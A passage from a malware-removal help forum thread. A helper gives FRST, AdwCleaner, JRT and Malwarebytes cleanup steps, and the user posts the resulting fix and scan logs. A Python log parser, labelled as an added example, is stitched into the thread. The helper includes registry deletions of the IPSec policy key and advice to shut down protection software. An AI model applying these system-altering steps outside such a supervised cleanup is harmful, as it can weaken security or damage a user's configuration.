    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Open FRST/FRST64 and press the > Fix < button just once and wait.
    If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
    When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

    ~~~~~~~~~~~~~~~~~~~~~~~~

    AdwCleaner
    • Please download AdwCleaner and save the file to your Desktop.
    • Right-Click AdwCleaner.exe and select Run as administrator to run the programme.
    • Follow the prompts.
    • Click Scan.
    • Upon completion, click Report. A log (AdwCleaner[SX].txt) will open. Briefly check the log for anything you know to be legitimate.
    • Ensure anything you know to be legitimate does not have a checkmark, and click Clean.
    • Follow the prompts and allow your computer to reboot.
    • After rebooting, a log (AdwCleaner[SX].txt) will open. Copy the contents of the log and paste in your next reply.

    -- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



    Please download Junkware Removal Tool
    or from here http://downloads.malwarebytes.org/file/jrt
    to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8, right-click JRT.exe instead of double-clicking and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.


    ~~~~~~~~~~

    Download CKScanner by askey127 from HERE
    Important - Save it to your desktop.
    Double-click CKScanner.exe and click Search For Files.
    After a very short time, when the cursor hourglass disappears, click Save List To File.
    A message box will verify the file saved.
    Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    Download Malwarebytes' Anti-Malware TO YOUR DESKTOP


    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"







    • On the Dashboard click on Update Now
    • Go to the Settings tab
    • Under Settings, go to Detection and Protection
    • Under PUP and PUM, make sure both are set to show Treat Detections as Malware
    • Go to Advanced Settings and make sure Automatically Quarantine Detected Items is checked
    • Then on the Dashboard click on Scan
    • Make sure to select THREAT SCAN
    • Then click on Scan


    After the restart once you are back at your desktop, open MBAM once more.
    Click on the History tab > Application Logs.
    Double click on the scan log which shows the Date and time of the scan just performed.
    Click 'Copy to Clipboard'
    Paste the contents of the clipboard into your reply
    ~~~~~~~~~~~~~~~~~~~
    Please post:
    Fixlog.txt
    AdwCleaner[CX].txt
    JRT.txt
    CKFiles.txt
    Malwarebytes' Anti-Malware log
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.
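
Added example (not part of the original post and not FRST's own code): a short Python script for reviewing the Fixlog.txt that the fix step above produces. It skips the echoed fixlist at the top of the log and sorts each `target => outcome` line into changed, absent or review. The sample log is constructed in the Fixlog format seen in this thread; the function names, the three status labels and the keyword lists are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample in the layout of a Fixlog.txt: an echoed fixlist between
# two rows of asterisks, followed by one result line per processed entry.
SAMPLE_FIXLOG = r'''
fixlist content:
*****************
CloseProcesses:
Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\ExampleTask => C:\Program Files (x86)\Example\Wizard.exe <==== ATTENTION
C:\Users\Example\AppData\Local\Temp\setup.exe
*****************

Processes closed successfully.
"HKLM\Software\Example\ShellIconOverlayIdentifiers\ Overlay1" => key removed successfully
HKCR\CLSID\{00000000-0000-0000-0000-000000000001} => key not found.
HKLM\SOFTWARE\Example\SearchScopes\\DefaultScope => value restored successfully
C:\Program Files (x86)\Example\plugin.dll => not found.
C:\Users\Example\AppData\Local\Temp\setup.exe => moved successfully
C:\Users\Example\Desktop\Browser.lnk => Shortcut argument removed successfully.
C:\Users\Example\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
C:\Users\Example\AppData\Local\Temp\locked.exe => made-up status to exercise the fallback
EmptyTemp: => 4 GB temporary data Removed.
'''

ECHO_FENCE = re.compile(r'^\*{5,}$')                       # row of asterisks around the echo
ABSENT = re.compile(r'\bnot found\b', re.I)                # target did not exist
NEGATIVE = re.compile(r'\b(not|unable|failed|error|denied)\b', re.I)
CHANGED = re.compile(r'\b(removed|moved|restored)\b', re.I)


def classify(outcome):
    """Map an outcome string to 'changed', 'absent' or 'review' (fail-safe)."""
    if ABSENT.search(outcome):
        return "absent"
    if NEGATIVE.search(outcome):
        return "review"      # e.g. "could not be removed" must not count as changed
    if CHANGED.search(outcome):
        return "changed"
    return "review"          # anything unrecognised goes to a human


def parse_fixlog(text):
    """Return (target, outcome, status) for every result line outside the echo."""
    results = []
    in_echo = False
    for raw in text.splitlines():
        line = raw.strip()
        if ECHO_FENCE.match(line):
            in_echo = not in_echo        # the echoed fixlist also contains ' => '
            continue
        if in_echo or " => " not in line:
            continue
        target, _, outcome = line.partition(" => ")
        results.append((target.strip().strip('"'), outcome.strip(), classify(outcome)))
    return results


def summarize(results):
    """Count result lines per status."""
    return Counter(status for _, _, status in results)


def follow_up(results):
    """Entries whose outcome was neither a clean change nor a clean 'not found'."""
    return [(target, outcome) for target, outcome, status in results if status == "review"]


if __name__ == "__main__":
    parsed = parse_fixlog(SAMPLE_FIXLOG)
    print(dict(summarize(parsed)))
    for target, outcome in follow_up(parsed):
        print("REVIEW:", target, "=>", outcome)
```

To use it on a real log, read Fixlog.txt into a string and pass it to `parse_fixlog`; entries reported as absent were already gone before the fix ran.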

  6. #6
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Post FixLog, AdwCleaner[CX], JRT, CKFiles, Malwarebytes' Anti-Malware Log

    Fix result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
    Ran by Kym (2016-03-01 12:19:19) Run:1
    Running from C:\Users\Kym\Desktop
    Loaded Profiles: Kym (Available Profiles: Kym)
    Boot Mode: Normal
    ==============================================

    fixlist content:
    *****************
    start
    CreateRestorePoint:
    CloseProcesses:
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    SearchScopes: HKLM -> DefaultScope value is missing
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
    FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    C:\Users\Kym\IP_Log_Data.js
    C:\Users\Kym\Network_Meter_Data.js
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
    CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
    Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
    Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
    Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
    Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
    Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
    Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
    Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
    Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
    Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
    Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
    Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
    ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
    AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
    AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
    EmptyTemp:
    End
    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

    Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
    *****************

    Restore point was successfully created.
    Processes closed successfully.
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
    "HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
    "HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
    "HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
    "HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
    "HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay" => key removed successfully
    HKCR\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => key not found.
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}" => key removed successfully
    "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5" => key removed successfully
    "HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}" => key removed successfully
    HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
    HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
    "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c4e7ab80-82fd-49d4-801d-669cc0a2392a}" => key removed successfully
    HKCR\Wow6432Node\CLSID\{c4e7ab80-82fd-49d4-801d-669cc0a2392a} => key not found.
    "HKLM\Software\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin" => key removed successfully
    C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
    C:\Users\Kym\IP_Log_Data.js => moved successfully
    C:\Users\Kym\Network_Meter_Data.js => moved successfully
    C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll => moved successfully
    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe => moved successfully
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe => moved successfully
    "HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0670C04C-B47A-469A-BABD-11885BDDC6F8}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5}" => key removed successfully
    C:\WINDOWS\System32\Tasks\LaunchSignup => moved successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EB27F80-D69B-4285-8431-E37E2A44624A}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23C32510-6B84-4F00-B6A2-A3556CA995C0}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2425DF79-2B81-4356-8999-0E846F585C3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3405AE0C-9596-4F8A-B29D-FDD7C18CB80B}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D034A175-EFC9-4CF2-A88F-697EA1808E3E}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC1A0053-4233-4A19-B33C-29FB18854840}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F260FB74-77B4-4085-8A55-DE82940B9EC6}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB4D8425-9FA5-4EB8-8614-99CAFB66A562}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53}" => key removed successfully
    "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
    C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Shortcut argument removed successfully.
    C:\Users\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
    C:\Users\Kym\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.
    C:\Users\Public\.DS_Store => ":AFP_AfpInfo" ADS removed successfully.

    ========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========


    ========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========


    ========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========


    ========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

    The operation completed successfully.



    ========= End of Reg: =========

    EmptyTemp: => 4 GB temporary data Removed.


    The system needed a reboot.

    ==== End of Fixlog 12:20:13 ====

    # AdwCleaner v5.037 - Logfile created 01/03/2016 at 12:31:36
    # Updated 28/02/2016 by Xplode
    # Database : 2016-02-28.2 [Server]
    # Operating system : Windows 10 Home (x64)
    # Username : Kym - KYM-PC
    # Running from : C:\Users\Kym\Desktop\AdwCleaner.exe
    # Option : Clean
    # Support : http://toolslib.net/forum

    ***** [ Services ] *****


    ***** [ Folders ] *****

    [-] Folder Deleted : C:\ProgramData\AppVerifier
    [-] Folder Deleted : C:\ProgramData\0342bcb1-0de3-0
    [-] Folder Deleted : C:\ProgramData\0342bcb1-60e1-0
    [-] Folder Deleted : C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
    [-] Folder Deleted : C:\ProgramData\3af26a8e-3475-0
    [-] Folder Deleted : C:\ProgramData\3af26a8e-45f1-1
    [-] Folder Deleted : C:\ProgramData\3c355888
    [-] Folder Deleted : C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
    [-] Folder Deleted : C:\ProgramData\{0b5d3910-112c-1}
    [-] Folder Deleted : C:\ProgramData\{21b5474a-312c-0}
    [-] Folder Deleted : C:\Users\Kym\AppData\Roaming\EasyFileOpener

    ***** [ Files ] *****

    [-] File Deleted : C:\appverifier.txt
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_malwarebytes-anti-malware.en.softonic.com_0.localstorage-journal
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage
    [-] File Deleted : C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_nps.pastaleads.com_0.localstorage-journal
    [-] File Deleted : C:\WINDOWS\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
    [-] File Deleted : C:\WINDOWS\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb

    ***** [ DLLs ] *****


    ***** [ Shortcuts ] *****


    ***** [ Scheduled tasks ] *****

    [-] Task Deleted : {9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D}

    ***** [ Registry ] *****

    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c355888}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    [-] Key Deleted : HKCU\Software\ICSW1.17
    [-] Key Deleted : HKCU\Software\powerpack
    [-] Key Deleted : HKCU\Software\PRODUCTSETUP
    [-] Key Deleted : HKCU\Software\TornTv Downloader
    [-] Key Deleted : HKLM\SOFTWARE\mystartsearchSoftware
    [-] Key Deleted : HKLM\SOFTWARE\SPPDCOM
    [-] Key Deleted : [x64] HKLM\SOFTWARE\AppVerifierService
    [-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
    [-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa} [NameServer]
    [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\nps.pastaleads.com
    [-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\chrome-64-bit.en.softonic.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\nps.pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\softonic.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\chrome-64-bit.en.softonic.com
